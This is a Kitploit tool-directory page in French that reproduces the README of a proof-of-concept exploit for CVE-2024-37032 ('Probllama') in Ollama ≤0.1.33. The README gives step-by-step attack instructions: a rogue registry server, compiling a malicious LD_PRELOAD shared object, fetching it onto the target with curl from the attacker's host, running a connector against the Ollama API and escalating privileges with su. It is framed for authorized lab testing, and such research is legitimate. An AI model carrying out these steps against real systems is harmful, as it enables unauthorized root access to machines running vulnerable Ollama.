Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-37032-PoC — CVE-2024-37032 (Probllama) PoC pour Ollama ≤0.1.33 : traversée de chemin et écriture arbitraire de fichier via la gestion du digest de modèle, conduisant à une élévation automatique de privilèges. | Kitploit
Outils/GitHubGitHub/itzsh4dowxz/cve-2024-37032-poc
Escalade de PrivilègesAnalyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingDéveloppement de Charges Utiles

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
GitHub
itzsh4dowxz/cve-2024-37032-poc

CVE-2024-37032-PoC

CVE-2024-37032 (Probllama) PoC pour Ollama ≤0.1.33 : traversée de chemin et écriture arbitraire de fichier via la gestion du digest de modèle, conduisant à une élévation automatique de privilèges.

Voir le dépôt
83il y a 2 moisPas encore vérifié

CVE-2024-37032 Probllama PoC — Démonstration de contournement de chemin et d'escalade de privilèges Ollama

Ce dépôt contient un serveur de registre FastAPI de preuve de concept, un script de connexion et une bibliothèque de démonstration de préchargement pour des tests en laboratoire autorisés.

Utilisez-le uniquement sur des systèmes que vous possédez ou pour lesquels vous avez explicitement l'autorisation de tester.

Fichiers

  • server.py : démarre le serveur PoC FastAPI.
  • rogue_server/config.py : configuration centrale pour le serveur PoC.
  • connector.py : envoie les requêtes pull/push à l'API Ollama cible.
  • preload_privs_demo.c : source C pour la charge utile d'objet partagé.
  • requirements.txt : dépendances Python pour le serveur PoC.

1. Installer les dépendances du serveur

Sur votre machine hôte, installez les dépendances Python :

root@kitploit:~
python -m pip install -r requirements.txt

2. Configurer l'hôte et les ports

Modifiez rogue_server/config.py sur votre machine hôte :

root@kitploit:~
HOST = "<your_host_ip_or_host_ip>"

Modifiez connector.py :

root@kitploit:~
SERVER_HOST = "<your_host_ip_or_host_ip:8000>"
TARGET_HOST = "127.0.0.1"
TARGET_PORT = 11434

Notes :

  • SERVER_HOST doit pointer vers l'hôte exécutant server.py.
  • Si le serveur PoC est exécuté sur le port 8000, incluez le port dans HOST et SERVER_HOST, par exemple 10.10.16.160:8000.
  • TARGET_HOST et TARGET_PORT doivent pointer vers l'API Ollama cible. Si connector.py est exécuté directement sur la machine cible, 127.0.0.1:11434 est généralement correct.
  • Si vous modifiez rogue_server/config.py, redémarrez le serveur PoC.

3. Compiler l'objet partagé

Compilez le fichier C et nommez la sortie libpreload_privs_demo.so :

root@kitploit:~
gcc -shared -fPIC -o libpreload_privs_demo.so preload_privs_demo.c

4. Transférer les fichiers vers la cible

Copiez ces fichiers sur la machine cible autorisée :

  • libpreload_privs_demo.so
  • connector.py

Une façon simple est de les servir depuis votre machine hôte :

root@kitploit:~
python3 -m http.server 8081

Ensuite, téléchargez-les depuis la machine cible :

root@kitploit:~
curl -O http://<your_host_ip>:8081/libpreload_privs_demo.so
curl -O http://<your_host_ip>:8081/connector.py

Après avoir téléchargé l'objet partagé, copiez son chemin absolu sur la machine cible et définissez ce même chemin comme exploit_path dans rogue_server/config.py sur la machine hôte.

Exemple :

root@kitploit:~
exploit_path = "/tmp/libpreload_privs_demo.so"

5. Démarrer le serveur PoC

Démarrez le serveur FastAPI sur votre machine hôte :

root@kitploit:~
python server.py

Par défaut, ce projet démarre Uvicorn sur 0.0.0.0:8000.

6. Exécuter le connecteur

Sur la machine cible autorisée, exécutez :

root@kitploit:~
python3 connector.py

Le connecteur envoie les requêtes pull et push à l'API Ollama configurée.

7. Valider le résultat

Une fois le connecteur terminé, exécutez :

root@kitploit:~
su

Sur une cible de laboratoire vulnérable et correctement configurée, le chemin de préchargement devrait être utilisé et la transition de privilèges peut être observée.

Dépannage

  • Vérifiez que le pare-feu de l'hôte autorise le port du serveur PoC et le port du serveur de fichiers temporaire.
  • Vérifiez que SERVER_HOST dans connector.py correspond à HOST dans rogue_server/config.py.
  • Vérifiez que exploit_path est le chemin absolu exact où libpreload_privs_demo.so se trouve sur la machine cible.
  • Vérifiez que l'API Ollama cible est accessible à TARGET_HOST:TARGET_PORT.
  • Redémarrez server.py après avoir modifié rogue_server/config.py.
Télécharger l’outil